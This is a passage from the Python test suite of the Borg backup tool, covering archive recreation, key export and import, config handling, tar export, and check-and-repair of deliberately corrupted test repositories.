    self.cmd('create', self.repository_location + '::test', 'input', '-C', 'none')

    def compressible_stats():
        # returns (size, csize, sha256) for the test file, as strings
        listing = self.cmd('list', self.repository_location + '::test', 'input/compressible',
                           '--format', '{size} {csize} {sha256}')
        return listing.split(' ')

    size, csize, sha256_before = compressible_stats()
    assert int(csize) >= int(size)  # >= due to metadata overhead
    self.cmd('recreate', self.repository_location, '-C', 'lz4', '--recompress')
    self.check_cache()
    size, csize, sha256_after = compressible_stats()
    assert int(csize) < int(size)
    assert sha256_before == sha256_after
def test_recreate_timestamp(self):
    """recreate --timestamp/--comment must rewrite the archive's start/end times."""
    # tzinfo of the machine running the test, for converting the UTC timestamp
    local_timezone = datetime.now(timezone(timedelta(0))).astimezone().tzinfo
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    archive = self.repository_location + '::test0'
    self.cmd('create', archive, 'input')
    self.cmd('recreate', '--timestamp', "1970-01-02T00:00:00", '--comment',
             'test', archive)
    info = self.cmd('info', archive).splitlines()
    # 'info' prints local time, so shift the requested UTC time accordingly
    dtime = datetime(1970, 1, 2) + local_timezone.utcoffset(None)
    s_time = dtime.strftime("%Y-%m-%d")
    assert any([re.search(r'Time \(start\).+ %s' % s_time, item) for item in info])
    assert any([re.search(r'Time \(end\).+ %s' % s_time, item) for item in info])
def test_recreate_dry_run(self):
    """recreate -n (dry run) must leave the archive contents unchanged."""
    self.create_regular_file('compressible', size=10000)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    listing_before = self.cmd('list', self.repository_location + '::test')
    self.cmd('recreate', self.repository_location, '-n', '-e', 'input/compressible')
    self.check_cache()
    listing_after = self.cmd('list', self.repository_location + '::test')
    assert listing_after == listing_before
def test_recreate_skips_nothing_to_do(self):
    """A no-op recreate must keep the archive byte-identical (including its ID)."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    info_before = self.cmd('info', self.repository_location + '::test')
    self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
    self.check_cache()
    info_after = self.cmd('info', self.repository_location + '::test')
    assert info_before == info_after  # includes archive ID
def test_with_lock(self):
    """with-lock must hold the exclusive repository lock while the subcommand runs."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    lock_path = os.path.join(self.repository_path, 'lock.exclusive')
    # the probe exits with 42 iff the exclusive lock exists while it runs
    probe = ('python3', '-c', 'import os, sys; sys.exit(42 if os.path.exists("%s") else 23)' % lock_path)
    self.cmd('with-lock', self.repository_location, *probe, fork=True, exit_code=42)
def test_recreate_list_output(self):
    """recreate must log processed/excluded files only when --list is given."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    for i in range(1, 6):
        self.create_regular_file('file%d' % i, size=0)
    self.cmd('create', self.repository_location + '::test', 'input')
    # (extra flags, path excluded in this run, whether files should be listed)
    cases = [
        (('--list', '--info'), 'input/file2', True),
        (('--list',), 'input/file3', True),
        ((), 'input/file4', False),
        (('--info',), 'input/file5', False),
    ]
    for flags, excluded, listed in cases:
        output = self.cmd('recreate', *flags, self.repository_location + '::test', '-e', excluded)
        self.check_cache()
        expect = self.assert_in if listed else self.assert_not_in
        expect('input/file1', output)
        expect('x ' + excluded, output)
def test_bad_filters(self):
    """delete must reject combining --first with --last (usage error, rc 2)."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    self.cmd('delete', '--first', '1', '--last', '1', self.repository_location, fork=True, exit_code=2)
def test_key_export_keyfile(self):
    """Export of a keyfile repo key must match the on-disk keyfile, and
    re-import must restore a deleted keyfile byte-for-byte."""
    export_file = self.output_path + '/exported'
    self.cmd('init', self.repository_location, '--encryption', 'keyfile')
    repo_id = self._extract_repository_id(self.repository_path)
    self.cmd('key', 'export', self.repository_location, export_file)
    with open(export_file, 'r') as fd:
        export_contents = fd.read()
    # exported keys carry a header naming the repository id
    assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
    key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
    with open(key_file, 'r') as fd:
        key_contents = fd.read()
    assert key_contents == export_contents
    # delete the keyfile, then import must recreate it identically
    os.unlink(key_file)
    self.cmd('key', 'import', self.repository_location, export_file)
    with open(key_file, 'r') as fd:
        key_contents2 = fd.read()
    assert key_contents2 == key_contents
def test_key_import_keyfile_with_borg_key_file(self):
    """'key import' must honor BORG_KEY_FILE instead of the default keys dir."""
    self.cmd('init', self.repository_location, '--encryption', 'keyfile')
    exported_key_file = os.path.join(self.output_path, 'exported')
    self.cmd('key', 'export', self.repository_location, exported_key_file)
    key_file = os.path.join(self.keys_path, os.listdir(self.keys_path)[0])
    with open(key_file, 'r') as fd:
        key_contents = fd.read()
    # remove the default-location keyfile so only the env override can restore it
    os.unlink(key_file)
    imported_key_file = os.path.join(self.output_path, 'imported')
    with environment_variable(BORG_KEY_FILE=imported_key_file):
        self.cmd('key', 'import', self.repository_location, exported_key_file)
    assert not os.path.isfile(key_file), '"borg key import" should respect BORG_KEY_FILE'
    with open(imported_key_file, 'r') as fd:
        imported_key_contents = fd.read()
    assert imported_key_contents == key_contents
def test_key_export_repokey(self):
    """Export of a repokey must match the repo key, and import must restore
    a wiped repo key so it decrypts to the same enc_key."""
    export_file = self.output_path + '/exported'
    self.cmd('init', self.repository_location, '--encryption', 'repokey')
    repo_id = self._extract_repository_id(self.repository_path)
    self.cmd('key', 'export', self.repository_location, export_file)
    with open(export_file, 'r') as fd:
        export_contents = fd.read()
    # exported keys carry a header naming the repository id
    assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
    with Repository(self.repository_path) as repository:
        repo_key = RepoKey(repository)
        repo_key.load(None, Passphrase.env_passphrase())
    backup_key = KeyfileKey(key.TestKey.MockRepository())
    backup_key.load(export_file, Passphrase.env_passphrase())
    assert repo_key.enc_key == backup_key.enc_key
    # wipe the key stored in the repository, then import must restore it
    with Repository(self.repository_path) as repository:
        repository.save_key(b'')
    self.cmd('key', 'import', self.repository_location, export_file)
    with Repository(self.repository_path) as repository:
        repo_key2 = RepoKey(repository)
        repo_key2.load(None, Passphrase.env_passphrase())
    # BUGFIX: the original compared repo_key2 against itself (a tautology);
    # the re-imported key must equal the key read before the wipe.
    assert repo_key2.enc_key == repo_key.enc_key
def test_key_export_qr(self):
    """key export --qr-html must produce a complete HTML page containing the repo id."""
    html_file = self.output_path + '/exported.html'
    self.cmd('init', self.repository_location, '--encryption', 'repokey')
    repo_id = self._extract_repository_id(self.repository_path)
    self.cmd('key', 'export', '--qr-html', self.repository_location, html_file)
    with open(html_file, 'r', encoding='utf-8') as fd:
        html = fd.read()
    assert bin_to_hex(repo_id) in html
    # sanity: it is a whole, well-formed HTML document
    assert html.startswith('<!doctype html>')
    assert html.endswith('</html>\n')
def test_key_export_directory(self):
    """key export must fail when the target path is an existing directory."""
    export_directory = self.output_path + '/exported'
    os.mkdir(export_directory)
    self.cmd('init', self.repository_location, '--encryption', 'repokey')
    self.cmd('key', 'export', self.repository_location, export_directory, exit_code=EXIT_ERROR)
def test_key_import_errors(self):
    """key import must reject missing files, non-key files and id-mismatched keys."""
    export_file = self.output_path + '/exported'
    self.cmd('init', self.repository_location, '--encryption', 'keyfile')
    # file does not exist yet
    self.cmd('key', 'import', self.repository_location, export_file, exit_code=EXIT_ERROR)
    # file exists but is not a borg key file
    with open(export_file, 'w') as fd:
        fd.write('something not a key\n')
    if self.FORK_DEFAULT:
        self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
    else:
        with pytest.raises(NotABorgKeyFile):
            self.cmd('key', 'import', self.repository_location, export_file)
    # valid header, but for a different repository id
    with open(export_file, 'w') as fd:
        fd.write('BORG_KEY a0a0a0\n')
    if self.FORK_DEFAULT:
        self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
    else:
        with pytest.raises(RepoIdMismatch):
            self.cmd('key', 'import', self.repository_location, export_file)
def test_key_export_paperkey(self):
    """key export --paper must emit the exact human-typable paper key format."""
    repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
    export_file = self.output_path + '/exported'
    self.cmd('init', self.repository_location, '--encryption', 'keyfile')
    # fix the repo id and key material so the expected output is deterministic
    self._set_repository_id(self.repository_path, unhexlify(repo_id))
    key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
    with open(key_file, 'w') as fd:
        fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
        fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
    self.cmd('key', 'export', '--paper', self.repository_location, export_file)
    with open(export_file, 'r') as fd:
        export_contents = fd.read()
    # expected text must match byte-for-byte (checksums included)
    assert export_contents == """To restore key use borg key import --paper /path/to/repo
BORG PAPER KEY v1
id: 2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02
1: 616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d
2: 737475 - 88
"""
def test_key_import_paperkey(self):
    """Interactive --paper import must recover from typos, bad checksums and aborts."""
    repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
    self.cmd('init', self.repository_location, '--encryption', 'keyfile')
    # fix repo id / key material so the typed lines below are valid for it
    self._set_repository_id(self.repository_path, unhexlify(repo_id))
    key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
    with open(key_file, 'w') as fd:
        fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
        fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
    # simulated keyboard input: several malformed attempts, each re-prompted,
    # then the correct lines
    typed_input = (
        b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 02\n'   # Forgot to type "-"
        b'2 / e29442 3506da 4e1ea7 25f62a 5a3d41 - 02\n'   # Forgot to type second "/"
        b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d42 - 02\n'  # Typo (..42 not ..41)
        b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n'  # Correct! Congratulations
        b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
        b'\n\n'  # Abort [yN] => N
        b'737475 88\n'  # missing "-"
        b'73747i - 88\n'  # typo
        b'73747 - 88\n'  # missing nibble
        b'73 74 75 - 89\n'  # line checksum mismatch
        b'00a1 - 88\n'  # line hash collision - overall hash mismatch, have to start over
        b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n'
        b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
        b'73 74 75 - 88\n'
    )
    # In case that this has to change, here is a quick way to find a colliding line hash:
    #
    # from hashlib import sha256
    # hash_fn = lambda x: sha256(b'\x00\x02' + x).hexdigest()[:2]
    # for i in range(1000):
    #     if hash_fn(i.to_bytes(2, byteorder='big')) == '88':  # 88 = line hash
    #         print(i.to_bytes(2, 'big'))
    #         break
    self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
    # Test abort paths
    typed_input = b'\ny\n'
    self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
    typed_input = b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n\ny\n'
    self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
def test_debug_dump_manifest(self):
    """'debug dump-manifest' must write a JSON file with the expected top-level keys."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    dump_file = self.output_path + '/dump'
    assert self.cmd('debug', 'dump-manifest', self.repository_location, dump_file) == ""
    with open(dump_file, "r") as f:
        result = json.load(f)
    for expected_key in ('archives', 'config', 'item_keys', 'timestamp', 'version'):
        assert expected_key in result
def test_debug_dump_archive(self):
    """'debug dump-archive' must write a JSON file with the expected sections."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    dump_file = self.output_path + '/dump'
    assert self.cmd('debug', 'dump-archive', self.repository_location + "::test", dump_file) == ""
    with open(dump_file, "r") as f:
        result = json.load(f)
    for section in ('_name', '_manifest_entry', '_meta', '_items'):
        assert section in result
def test_debug_refcount_obj(self):
    """'debug refcount-obj' must report missing, referenced and invalid object ids."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    # unknown (all-zero) id
    output = self.cmd('debug', 'refcount-obj', self.repository_location, '0' * 64).strip()
    assert output == 'object 0000000000000000000000000000000000000000000000000000000000000000 not found [info from chunks cache].'
    # the archive metadata object is referenced exactly once
    create_json = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
    archive_id = create_json['archive']['id']
    output = self.cmd('debug', 'refcount-obj', self.repository_location, archive_id).strip()
    assert output == 'object ' + archive_id + ' has 1 referrers [info from chunks cache].'
    # Invalid IDs do not abort or return an error
    output = self.cmd('debug', 'refcount-obj', self.repository_location, '124', 'xyza').strip()
    assert output == 'object id 124 is invalid.\nobject id xyza is invalid.'
def test_debug_info(self):
    """'debug info' output must mention the CRC implementation and Python."""
    output = self.cmd('debug', 'info')
    for needle in ('CRC implementation', 'Python'):
        assert needle in output
def test_benchmark_crud(self):
    """Smoke-test 'benchmark crud' in its reduced test mode (env-triggered)."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    with environment_variable(_BORG_BENCHMARK_CRUD_TEST='YES'):
        self.cmd('benchmark', 'crud', self.repository_location, self.input_path)
def test_config(self):
    """Exercise 'borg config': list, get, set and delete repository options."""
    self.create_test_files()
    os.unlink('input/flagfile')
    self.cmd('init', '--encryption=repokey', self.repository_location)
    # --list shows the standard repository options
    output = self.cmd('config', '--list', self.repository_location)
    self.assert_in('[repository]', output)
    self.assert_in('version', output)
    self.assert_in('segments_per_dir', output)
    self.assert_in('storage_quota', output)
    self.assert_in('append_only', output)
    self.assert_in('additional_free_space', output)
    self.assert_in('id', output)
    self.assert_not_in('last_segment_checked', output)
    # option absent -> error; after setting it, it is readable and listed
    output = self.cmd('config', self.repository_location, 'last_segment_checked', exit_code=1)
    self.assert_in('No option ', output)
    self.cmd('config', self.repository_location, 'last_segment_checked', '123')
    output = self.cmd('config', self.repository_location, 'last_segment_checked')
    assert output == '123' + '\n'
    output = self.cmd('config', '--list', self.repository_location)
    self.assert_in('last_segment_checked', output)
    self.cmd('config', '--delete', self.repository_location, 'last_segment_checked')
    # set/get/delete round-trip for plain and section-qualified keys
    for cfg_key, cfg_value in [
        ('additional_free_space', '2G'),
        ('repository.append_only', '1'),
    ]:
        output = self.cmd('config', self.repository_location, cfg_key)
        assert output == '0' + '\n'  # both options default to 0
        self.cmd('config', self.repository_location, cfg_key, cfg_value)
        output = self.cmd('config', self.repository_location, cfg_key)
        assert output == cfg_value + '\n'
        self.cmd('config', '--delete', self.repository_location, cfg_key)
        self.cmd('config', self.repository_location, cfg_key, exit_code=1)
    # invalid invocations
    self.cmd('config', '--list', '--delete', self.repository_location, exit_code=2)
    self.cmd('config', self.repository_location, exit_code=2)
    self.cmd('config', self.repository_location, 'invalid-option', exit_code=1)
# Shared skip markers for the tar export tests below: GNU tar is required for
# extraction; gzip additionally for the .tar.gz variant.
requires_gnutar = pytest.mark.skipif(not have_gnutar(), reason='GNU tar must be installed for this test.')
requires_gzip = pytest.mark.skipif(not shutil.which('gzip'), reason='gzip must be installed for this test.')
@requires_gnutar
def test_export_tar(self):
    """An exported plain tar must reproduce the input tree when extracted by GNU tar."""
    self.create_test_files()
    os.unlink('input/flagfile')
    self.cmd('init', '--encryption=repokey', self.repository_location)
    archive = self.repository_location + '::test'
    self.cmd('create', archive, 'input')
    self.cmd('export-tar', archive, 'simple.tar', '--progress')
    with changedir('output'):
        # This probably assumes GNU tar. Note -p switch to extract permissions regardless of umask.
        subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
    self.assert_dirs_equal('input', 'output/input', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
@requires_gzip
def test_export_tar_gz(self):
    """export-tar must auto-gzip by extension and support --list; the extracted
    tree must match the input."""
    # NOTE: the former in-body shutil.which('gzip') skip was dead code --
    # @requires_gzip already skips this test when gzip is missing.
    self.create_test_files()
    os.unlink('input/flagfile')
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    listing = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar.gz', '--list')
    assert 'input/file1\n' in listing
    assert 'input/dir2\n' in listing
    with changedir('output'):
        subprocess.check_call(['tar', 'xpf', '../simple.tar.gz', '--warning=no-timestamp'])
    self.assert_dirs_equal('input', 'output/input', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
def test_export_tar_strip_components(self):
    """--strip-components must remove leading path elements from archived entries."""
    # NOTE: removed a copy-paste leftover that skipped this test when gzip was
    # missing -- this test exports a plain .tar and never uses gzip.
    self.create_test_files()
    os.unlink('input/flagfile')
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    listing = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--strip-components=1', '--list')
    # --list's path are those before processing with --strip-components
    assert 'input/file1\n' in listing
    assert 'input/dir2\n' in listing
    with changedir('output'):
        subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
    # one component stripped: the tree lands directly under output/
    self.assert_dirs_equal('input', 'output/', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_hardlinks
@requires_gnutar
def test_export_tar_strip_components_links(self):
    """Hard links must survive export-tar with --strip-components."""
    self._extract_hardlinks_setup()
    self.cmd('export-tar', self.repository_location + '::test', 'output.tar', '--strip-components=2')
    with changedir('output'):
        subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
        # every member of each hardlink pair must still have 2 links
        for name in ('hardlink', 'subdir/hardlink', 'aaaa', 'source2'):
            assert os.stat(name).st_nlink == 2
@requires_hardlinks
@requires_gnutar
def test_extract_hardlinks_tar(self):
    """Hard links must survive a subtree export-tar and GNU tar extraction."""
    self._extract_hardlinks_setup()
    self.cmd('export-tar', self.repository_location + '::test', 'output.tar', 'input/dir1')
    with changedir('output'):
        subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
        # every member of each hardlink pair must still have 2 links
        for name in ('hardlink', 'subdir/hardlink', 'aaaa', 'source2'):
            assert os.stat(os.path.join('input/dir1', name)).st_nlink == 2
def test_detect_attic_repo(self):
    """Every repo-touching command must refuse to operate on an attic repository."""
    path = make_attic_repo(self.repository_path)
    commands = (
        ('create', path + '::test', self.tmpdir),
        ('extract', path + '::test'),
        ('check', path),
        ('rename', path + '::test', 'newname'),
        ('list', path),
        ('delete', path),
        ('prune', path),
        ('info', path + '::test'),
        ('key', 'export', path, 'exported'),
        ('key', 'import', path, 'import'),
        ('key', 'change-passphrase', path),
        ('break-lock', path),
    )
    for args in commands:
        assert 'Attic repository detected.' in self.cmd(*args, fork=True, exit_code=2)
@unittest.skipUnless('binary' in BORG_EXES, 'no borg.exe available')
class ArchiverTestCaseBinary(ArchiverTestCase):
    """Re-run the archiver test suite against the pyinstaller-built borg binary.

    Tests that patch Python objects or otherwise assume in-process execution
    are skipped, since the binary always runs in a separate process.
    """
    EXE = 'borg.exe'          # run the fat binary instead of the source tree
    FORK_DEFAULT = True       # the binary can only be exercised via fork/exec

    @unittest.skip('does not raise Exception, but sets rc==2')
    def test_init_parent_dirs(self):
        pass

    @unittest.skip('patches objects')
    def test_init_interrupt(self):
        pass

    @unittest.skip('patches objects')
    def test_extract_capabilities(self):
        pass

    @unittest.skip('patches objects')
    def test_extract_xattrs_errors(self):
        pass

    @unittest.skip('test_basic_functionality seems incompatible with fakeroot and/or the binary.')
    def test_basic_functionality(self):
        pass

    @unittest.skip('test_overwrite seems incompatible with fakeroot and/or the binary.')
    def test_overwrite(self):
        pass

    def test_fuse(self):
        # fuse + fakeroot + binary do not mix; only run outside fakeroot
        if fakeroot_detected():
            unittest.skip('test_fuse with the binary is not compatible with fakeroot')
        else:
            super().test_fuse()
class ArchiverCheckTestCase(ArchiverTestCaseBase):
    """Tests for 'borg check' / 'borg check --repair' on deliberately damaged repositories."""
    def setUp(self):
        """Create a repokey repo with two source archives.

        The tiny ChunkBuffer.BUFFER_SIZE forces the archive item metadata to be
        split over many chunks, so metadata-chunk damage can be simulated.
        """
        super().setUp()
        with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
            self.cmd('init', '--encryption=repokey', self.repository_location)
            self.create_src_archive('archive1')
            self.create_src_archive('archive2')
    def test_check_usage(self):
        """Exercise the check CLI switches: --repository-only, --archives-only, --prefix, --first, --last."""
        output = self.cmd('check', '-v', '--progress', self.repository_location, exit_code=0)
        self.assert_in('Starting repository check', output)
        self.assert_in('Starting archive consistency check', output)
        self.assert_in('Checking segments', output)
        # reset logging to new process default to avoid need for fork=True on next check
        logging.getLogger('borg.output.progress').setLevel(logging.NOTSET)
        output = self.cmd('check', '-v', '--repository-only', self.repository_location, exit_code=0)
        self.assert_in('Starting repository check', output)
        self.assert_not_in('Starting archive consistency check', output)
        self.assert_not_in('Checking segments', output)
        output = self.cmd('check', '-v', '--archives-only', self.repository_location, exit_code=0)
        self.assert_not_in('Starting repository check', output)
        self.assert_in('Starting archive consistency check', output)
        output = self.cmd('check', '-v', '--archives-only', '--prefix=archive2', self.repository_location, exit_code=0)
        self.assert_not_in('archive1', output)
        output = self.cmd('check', '-v', '--archives-only', '--first=1', self.repository_location, exit_code=0)
        self.assert_in('archive1', output)
        self.assert_not_in('archive2', output)
        output = self.cmd('check', '-v', '--archives-only', '--last=1', self.repository_location, exit_code=0)
        self.assert_not_in('archive1', output)
        self.assert_in('archive2', output)
    def test_missing_file_chunk(self):
        """Delete a file's data chunk; check must flag it, repair must mark it, a fresh backup must heal it."""
        archive, repository = self.open_archive('archive1')
        with repository:
            for item in archive.iter_items():
                if item.path.endswith('testsuite/archiver.py'):
                    valid_chunks = item.chunks
                    killed_chunk = valid_chunks[-1]
                    repository.delete(killed_chunk.id)
                    break
            else:
                self.fail('should not happen')
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        output = self.cmd('check', '--repair', self.repository_location, exit_code=0)
        self.assert_in('New missing file chunk detected', output)
        self.cmd('check', self.repository_location, exit_code=0)
        output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
        self.assert_in('broken#', output)
        # check that the file in the old archives has now a different chunk list without the killed chunk
        for archive_name in ('archive1', 'archive2'):
            archive, repository = self.open_archive(archive_name)
            with repository:
                for item in archive.iter_items():
                    if item.path.endswith('testsuite/archiver.py'):
                        self.assert_not_equal(valid_chunks, item.chunks)
                        self.assert_not_in(killed_chunk, item.chunks)
                        break
                else:
                    self.fail('should not happen')
        # do a fresh backup (that will include the killed chunk)
        with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
            self.create_src_archive('archive3')
        # check should be able to heal the file now:
        output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
        self.assert_in('Healed previously missing file chunk', output)
        self.assert_in('testsuite/archiver.py: Completely healed previously damaged file!', output)
        # check that the file in the old archives has the correct chunks again
        for archive_name in ('archive1', 'archive2'):
            archive, repository = self.open_archive(archive_name)
            with repository:
                for item in archive.iter_items():
                    if item.path.endswith('testsuite/archiver.py'):
                        self.assert_equal(valid_chunks, item.chunks)
                        break
                else:
                    self.fail('should not happen')
        # list is also all-healthy again
        output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
        self.assert_not_in('broken#', output)
    def test_missing_archive_item_chunk(self):
        """Delete the first archive metadata (items) chunk; --repair must restore consistency."""
        archive, repository = self.open_archive('archive1')
        with repository:
            repository.delete(archive.metadata.items[0])
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        self.cmd('check', '--repair', self.repository_location, exit_code=0)
        self.cmd('check', self.repository_location, exit_code=0)
    def test_missing_archive_metadata(self):
        """Delete the archive metadata object itself; --repair must restore consistency."""
        archive, repository = self.open_archive('archive1')
        with repository:
            repository.delete(archive.id)
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        self.cmd('check', '--repair', self.repository_location, exit_code=0)
        self.cmd('check', self.repository_location, exit_code=0)
    def test_missing_manifest(self):
        """Delete the manifest; --repair must rebuild it and rediscover both archives."""
        archive, repository = self.open_archive('archive1')
        with repository:
            repository.delete(Manifest.MANIFEST_ID)
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
        self.assert_in('archive1', output)
        self.assert_in('archive2', output)
        self.cmd('check', self.repository_location, exit_code=0)
    def test_corrupted_manifest(self):
        """Append garbage to the manifest; --repair must rebuild it and rediscover both archives."""
        archive, repository = self.open_archive('archive1')
        with repository:
            manifest = repository.get(Manifest.MANIFEST_ID)
            corrupted_manifest = manifest + b'corrupted!'
            repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
        self.assert_in('archive1', output)
        self.assert_in('archive2', output)
        self.cmd('check', self.repository_location, exit_code=0)
    def test_manifest_rebuild_corrupted_chunk(self):
        """Corrupt manifest AND one archive chunk; rebuild must still find the intact archive2."""
        archive, repository = self.open_archive('archive1')
        with repository:
            manifest = repository.get(Manifest.MANIFEST_ID)
            corrupted_manifest = manifest + b'corrupted!'
            repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
            chunk = repository.get(archive.id)
            corrupted_chunk = chunk + b'corrupted!'
            repository.put(archive.id, corrupted_chunk)
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
        self.assert_in('archive2', output)
        self.cmd('check', self.repository_location, exit_code=0)
    def test_manifest_rebuild_duplicate_archive(self):
        """Inject a second archive named 'archive1'; the rebuilt manifest must rename it to 'archive1.1'."""
        archive, repository = self.open_archive('archive1')
        key = archive.key
        with repository:
            manifest = repository.get(Manifest.MANIFEST_ID)
            corrupted_manifest = manifest + b'corrupted!'
            repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
            # hand-craft a minimal archive metadata object with a clashing name
            archive = msgpack.packb({
                'cmdline': [],
                'items': [],
                'hostname': 'foo',
                'username': 'bar',
                'name': 'archive1',
                'time': '2016-12-15T18:49:51.849711',
                'version': 1,
            })
            archive_id = key.id_hash(archive)
            repository.put(archive_id, key.encrypt(archive))
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        self.cmd('check', '--repair', self.repository_location, exit_code=0)
        output = self.cmd('list', self.repository_location)
        self.assert_in('archive1', output)
        self.assert_in('archive1.1', output)
        self.assert_in('archive2', output)
    def test_extra_chunks(self):
        """Put an orphan chunk into the repo; check flags it, --repair removes it, extract still works."""
        self.cmd('check', self.repository_location, exit_code=0)
        with Repository(self.repository_location, exclusive=True) as repository:
            repository.put(b'01234567890123456789012345678901', b'xxxx')
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        self.cmd('check', self.repository_location, exit_code=1)
        self.cmd('check', '--repair', self.repository_location, exit_code=0)
        self.cmd('check', self.repository_location, exit_code=0)
        self.cmd('extract', '--dry-run', self.repository_location + '::archive1', exit_code=0)
    def _test_verify_data(self, *init_args):
        """Corrupt chunk payload in place; only check --verify-data must detect the integrity error.

        :param init_args: extra arguments for 'borg init' (encryption mode under test)
        """
        shutil.rmtree(self.repository_path)
        self.cmd('init', self.repository_location, *init_args)
        self.create_src_archive('archive1')
        archive, repository = self.open_archive('archive1')
        with repository:
            for item in archive.iter_items():
                if item.path.endswith('testsuite/archiver.py'):
                    chunk = item.chunks[-1]
                    data = repository.get(chunk.id) + b'1234'
                    repository.put(chunk.id, data)
                    break
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=0)
        output = self.cmd('check', '--verify-data', self.repository_location, exit_code=1)
        assert bin_to_hex(chunk.id) + ', integrity error' in output
        # repair (heal is tested in another test)
        output = self.cmd('check', '--repair', '--verify-data', self.repository_location, exit_code=0)
        assert bin_to_hex(chunk.id) + ', integrity error' in output
        assert 'testsuite/archiver.py: New missing file chunk detected' in output
    def test_verify_data(self):
        """--verify-data with encrypted (repokey) repository."""
        self._test_verify_data('--encryption', 'repokey')
    def test_verify_data_unencrypted(self):
        """--verify-data with unencrypted repository."""
        self._test_verify_data('--encryption', 'none')
    def test_empty_repository(self):
        """A repository stripped of all objects (including the manifest) must fail check."""
        with Repository(self.repository_location, exclusive=True) as repository:
            for id_ in repository.list():
                repository.delete(id_)
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
    def test_attic013_acl_bug(self):
        # Attic up to release 0.13 contained a bug where every item unintentionally received
        # a b'acl'=None key-value pair.
        # This bug can still live on in Borg repositories (through borg upgrade).
        class Attic013Item:
            def as_dict(self):
                return {
                    # These are required
                    b'path': '1234',
                    b'mtime': 0,
                    b'mode': 0,
                    b'user': b'0',
                    b'group': b'0',
                    b'uid': 0,
                    b'gid': 0,
                    # acl is the offending key.
                    b'acl': None,
                }
        archive, repository = self.open_archive('archive1')
        with repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            with Cache(repository, key, manifest) as cache:
                archive = Archive(repository, key, manifest, '0.13', cache=cache, create=True)
                archive.items_buffer.add(Attic013Item())
